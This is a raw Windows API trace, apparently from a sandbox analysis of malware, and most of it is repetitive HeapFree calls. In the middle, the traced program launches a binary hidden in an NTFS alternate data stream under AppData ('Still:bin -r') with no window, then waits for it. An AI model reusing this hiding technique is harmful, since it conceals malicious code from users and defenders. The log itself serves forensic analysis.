1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7395f8 | out: hHeap=0x6f0000) returned 1 [0106.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7394a8 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73b720 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73b9a0 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7397f0 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x733b60 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73ae60 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73c120 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73b7c0 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x733150 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x733f08 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73ba40 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x733fa0 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73b540 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73b360 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739898 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73bf40 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739be0 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739550 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73bcc0 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72d3a8 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73bb80 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x733208 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x734038 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x734100 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x733378 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7332c0 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73b040 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73b4a0 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73bea0 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7341c0 | out: hHeap=0x6f0000) returned 1 [0106.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73bae0 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739c88 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73bd60 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73be00 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7399e8 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73c260 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72e0b8 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73c760 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73c800 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73c580 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73c8a0 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x738b78 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73c620 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x738ec0 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x738f68 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73c300 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73c440 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739d30 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739dd8 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73c940 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72e638 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739e80 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72e8f8 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73c9e0 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73c4e0 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73a510 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73a7b0 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73c6c0 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73ca80 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73cb20 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73cbc0 | out: hHeap=0x6f0000) returned 1 [0106.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73a858 | out: hHeap=0x6f0000) returned 1 [0106.642] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73a270 | out: hHeap=0x6f0000) returned 1 [0106.642] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x733cd0 | out: hHeap=0x6f0000) returned 1 [0106.642] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73cc60 | out: hHeap=0x6f0000) returned 1 [0106.642] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73cd00 | out: hHeap=0x6f0000) returned 1 [0106.642] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73c3a0 | out: hHeap=0x6f0000) returned 1 [0106.642] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x734288 | out: hHeap=0x6f0000) returned 1 [0106.642] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x734c88 | out: hHeap=0x6f0000) returned 1 [0106.642] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73aa50 | out: hHeap=0x6f0000) returned 1 [0106.655] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still:bin") returned 41 [0106.655] lstrlenW (lpString="") returned 0 [0106.655] lstrlenW (lpString="-r") returned 2 [0106.655] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x5c) returned 0x7a99c0 [0106.655] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still:bin -r", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fee4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19ff28 | out: lpCommandLine="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still:bin -r", lpProcessInformation=0x19ff28*(hProcess=0x268, hThread=0x260, dwProcessId=0x704, dwThreadId=0x127c)) returned 1 [0109.208] WaitForSingleObject (hHandle=0x268, dwMilliseconds=0xffffffff) [0244.714] GetExitCodeProcess (in: hProcess=0x268, lpExitCode=0x19ff5c | out: lpExitCode=0x19ff5c*=0x0) returned 1 [0244.714] CloseHandle (hObject=0x260) returned 1 [0244.714] CloseHandle (hObject=0x268) returned 1 [0244.715] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7a99c0 | out: hHeap=0x6f0000) returned 1 [0244.716] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7cc668 | out: hHeap=0x6f0000) returned 1 [0244.719] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb510 | out: hHeap=0x6f0000) returned 1 [0244.719] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb3d0 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb630 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a220 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a2e0 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a0e0 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a0a0 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a420 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719f00 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719cc0 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb4d0 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb5f0 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb590 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb4b0 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb690 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb6b0 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb710 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb490 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a3e0 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a240 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a3c0 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a2c0 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a0c0 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a100 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a380 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719e40 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719ee0 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719ce0 | out: hHeap=0x6f0000) returned 1 [0244.720] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719dc0 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719d00 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719e60 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a020 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719f20 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719f60 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a000 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719d80 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb3b0 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb550 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb610 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb650 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb450 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a200 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a1c0 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a280 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a440 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a140 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a300 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a1e0 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a320 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a120 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a180 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719f40 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719e20 | out: hHeap=0x6f0000) returned 1 [0244.721] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719ec0 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719ea0 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719d20 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719f80 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a080 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719ca0 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719fa0 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719fe0 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a040 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719da0 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719de0 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb530 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb5b0 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb570 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb430 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb410 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb6f0 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a3a0 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a260 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a2a0 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a360 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a400 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a1a0 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a160 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a340 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719d60 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a060 | out: hHeap=0x6f0000) returned 1 [0244.722] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719fc0 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719d40 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fbf30 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fbc38 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fbcb0 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fbd00 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc250 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc278 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc228 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc188 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc1b0 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71abb0 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71ac28 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71ab88 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71ac00 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a9d0 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a610 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a8e0 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a8b8 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a5c0 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a6b0 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fbda0 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fbe90 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc3b8 | out: hHeap=0x6f0000) returned 1 [0244.723] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc110 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc2f0 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc368 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a9f8 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71aa20 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71aae8 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71ac50 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a9a8 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71aa98 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71abd8 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a548 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a520 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a4a8 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a4f8 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a660 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a728 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a570 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fbdf0 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fbd50 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc390 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc318 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc160 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc1d8 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc2c8 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71aa48 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71ab60 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71aac0 | out: hHeap=0x6f0000) returned 1 [0244.724] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71aa70 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a7c8 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a688 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a890 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a638 | out: hHeap=0x6f0000) returned 1 